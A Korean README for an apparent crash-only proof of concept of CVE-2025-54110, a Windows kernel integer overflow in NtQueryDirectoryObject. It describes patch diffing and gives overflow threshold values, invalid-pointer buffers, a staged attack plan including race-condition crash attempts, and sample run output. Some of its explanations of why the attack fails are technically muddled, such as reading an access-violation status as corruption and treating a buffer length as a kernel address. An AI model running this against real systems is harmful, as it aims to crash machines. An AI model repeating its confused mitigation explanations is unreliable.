
프로젝트 날짜 : 2025년 10월 / CVE-2025-54110의 PoC 구현 – Windows `NtQueryDirectoryObject` 시스템 호출의 커널 수준 정수 오버플로우 취약점.
Windows NtQueryDirectoryObject 시스템 호출의 커널 수준 정수 오버플로우 취약점인 CVE-2025-54110에 대한 PoC 구현입니다.
CVE: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110
이 저장소는 보안 연구, 리버스 엔지니어링 및 익스플로잇 개발 연구만을 위해 개발된 CVE-2025-54110 커널 EoP 취약점의 Crash-Only PoC를 포함합니다. 이 코드는 다음과 같은 취약점 연구 기술을 시연하기 위한 것입니다:
이 PoC는 권한 상승이나 안정적인 BSOD를 달성하지 않습니다. Windows 커널 보호에 의해 포착되는 접근 위반을 안전하게 트리거하도록 설계되었습니다.
공개일: 2025년 9월 (Windows 화요일 보안 패치)
| 속성 | 값 |
|---|---|
| CWE | CWE-190: 정수 오버플로우 또는 랩어라운드 |
| CVSS 3.1 점수 | 8.8 (높음) / 7.7 (임시) |
| 벡터 문자열 | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C |
| 공격 벡터 | 로컬 |
| 공격 복잡성 | 낮음 |
| 필요 권한 | 낮음 |
| 사용자 상호작용 | 없음 |
| 범위 | 변경됨 |
| 기밀성 | 높음 |
| 무결성 | 높음 |
| 가용성 | 높음 |
| 익스플로잇 성숙도 | 입증되지 않음 |
Windows 커널의 정수 오버플로우 취약점으로 인해 인증된 공격자가 로컬에서 권한을 상승시킬 가능성이 있습니다. Microsoft의 권고에 따르면:
"공격자는 샌드박스 처리된 사용자 모드 프로세스에서 특수하게 조작된 입력을 전송하여 정수 오버플로우를 트리거하고, 이로 인해 커널에서 버퍼 오버플로우가 발생하여 권한 상승 또는 샌드박스 이스케이프가 가능해집니다."
Windows Update Files from Aug 2025 & Sep 2025 (KB.msu) ↓ Extract CAB Files ↓ Calculate SHA-256 Hashes (August vs September) ↓ Identify Changed Files ↓ Ghidra Version Tracking Analysis ↓ Setting Symbol Servers to Clarify Function Names ↓ Function-Level Diff Comparison
### 2. 분석된 파일
초기 분석은 두 가지 주요 커널 구성 요소에 초점을 맞췄습니다:
#### win32k.sys (-)
- **결과:** 중요한 변경 사항 감지되지 않음
- **점수 범위:** 0.97-1.0 (높은 유사도)
- **결론:** CVE-2025-54110의 취약한 구성 요소가 아님
#### ntoskrnl.exe (+)
- **결과:** 여러 함수에서 중요한 변경 사항 발견
- **점수 범위:** 점수가 ≤0.951인 함수
- **길이 차이:** 소스 대 대상 바이트 길이 변동 감지됨
- **내보낸 총 항목:** 분석을 위한 2,036개의 함수
### 3. Ghidra 버전 추적 결과
`ntoskrnl.exe`에서 식별된 변경 사항 샘플:
| 점수 | 신뢰도 | 소스 길이 | 대상 길이 | 소스 함수 | 대상 함수 |
|-------|------------|---------------|-------------|-----------------|---------------|
| 0.951 | 2.618 | 1023 | 365 | FUN_1403146d0 | FUN_1403a4ea0 |
| 0.950 | 2.285 | 113 | 203 | FUN_140680810 | FUN_1406d952c |
| 0.950 | 3.137 | 782 | 1050 | FUN_14032106c | FUN_140303a38 |
| 0.951 | 2.675 | 141 | 171 | FUN_140407bd0 | FUN_140a172a0 |
| 0.951 | 2.660 | 346 | 150 | FUN_140610e60 | FUN_1406115d4 |
---
## PoC 설명
### 기술적 접근 방식
PoC (`precise_overflow_bsod.c`)는 다음을 통해 정수 오버플로 취약점을 트리거하려고 시도합니다:
1. **정밀 임계값 계산:** `0xfffffdbc` (base=0x20, name=0x200에서 파생됨)
2. **NtQueryDirectoryObject API:** 오버플로 트리거를 위한 대상 함수
3. **다단계 공격 전략:**
- 1단계: 정밀 정수 오버플로 시도
- 2단계: 커널 메모리 대상 지정
- 3단계: 다중 스레드 악용
### 코드 구조```c
// Key threshold values calculated for overflow
ULONG precise_thresholds[] = {
0xfffffdbc, // Precise threshold - base=0x20, name=0x200
0xfffffdbb, // Threshold - 1
0xfffffdbd, // Threshold + 1
0xfffffdba, // Threshold - 2
0xfffffdbe, // Threshold + 2
};
// Buffer configurations to test edge cases
PVOID buffer_types[] = {
VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE), // Normal buffer
VirtualAlloc(NULL, 0x10, MEM_COMMIT, PAGE_READWRITE), // Small buffer
NULL, // NULL pointer
(PVOID)0x4141414141414141, // Invalid pointer
(PVOID)0x0000000000000000, // Zero address
};
NtQueryDirectoryObject() Parameters: ├── DirectoryHandle: \BaseNamedObjects, \KernelObjects, etc. ├── Buffer: Various pointer configurations ├── BufferLength: Calculated overflow thresholds (0xfffffdbc variants) ├── ReturnSingleEntry: TRUE/FALSE variations ├── RestartScan: TRUE/FALSE variations └── Context: Controlled iteration state
## PoC가 시스템을 충돌시키지 않는 이유
### 실제 결과
PoC는 블루스크린(BSOD)을 유발하지 않고 일관되게 `STATUS_ACCESS_VIOLATION (0xC0000005)`을 반환합니다. 이는 **의도된** 것이며, 몇 가지 중요한 Windows 커널 보안 메커니즘을 보여줍니다:
### 1. 구조적 예외 처리 (SEH)```
User-Mode Input → NtQueryDirectoryObject
↓
ProbeForRead/Write
↓
__try { ... }
↓
Access Violation Detected
↓
__except { ... }
↓
Return STATUS_ACCESS_VIOLATION
작동 원리:
커널 모드(Ring 0)가 명시적 권한 없이 사용자 모드(Ring 3) 메모리에 접근하는 것을 방지하는 최신 CPU 기능:``` Kernel attempts to access user pointer ↓ SMAP checks permission (STAC/CLAC instructions) ↓ Unauthorized access detected ↓ CPU generates #PF (Page Fault) ↓ Caught by kernel exception handler
**Impact on PoC:**
- 오버플로가 발생하더라도, 커널에서 사용자 메모리로의 직접 접근이 차단됩니다.
- 포인터 역참조 취약점의 악용을 방지합니다.
### 3. KASLR (커널 주소 공간 레이아웃 무작위화)```
Boot Time: Kernel Base = Random Address
↓
Hardcoded PoC address (0xfffffdbc)
↓
Does NOT match actual kernel structures
↓
Write to non-critical memory OR caught by SEH
BSOD가 발생하지 않는 이유:
Windows 10+는 향상된 풀 손상 감지를 구현함:``` Heap/Pool Allocation ↓ Header Contains: ├── Magic Values ├── Size Information └── Checksums ↓ On Free/Access: Validate Integrity ↓ Corruption Detected? ↓ [YES] → Safe Exception → Return Error [NO] → Proceed Normally
---
## PoC 실행 출력 분석
### 예상 출력
`STATUS_ACCESS_VIOLATION (0xC0000005)`가 표시되면 정상입니다.```
C:\Users\reLab\Desktop\cve>.\poc64.exe
==================================================
CVE-2025-54110 - Kernel Integer Overflow PoC
==================================================
[!] WARNING: This code may crash the system (BSOD).
[?] Do you want to continue? (y/n): y
[>] Targeting directory: \BaseNamedObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \KernelObjects
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Sessions
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[>] Targeting directory: \Windows
[*] Attempting precision integer overflow...
[+] Corruption detected with threshold: 0xFFFFFDBC (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBB (Status: 0xC0000005)
[+] Corruption detected with threshold: 0xFFFFFDBD (Status: 0xC0000005)
[!] Vulnerability triggered. Attempting to crash system via race condition...
[-] Exploit finished. If the system is still running, the attack may have been mitigated.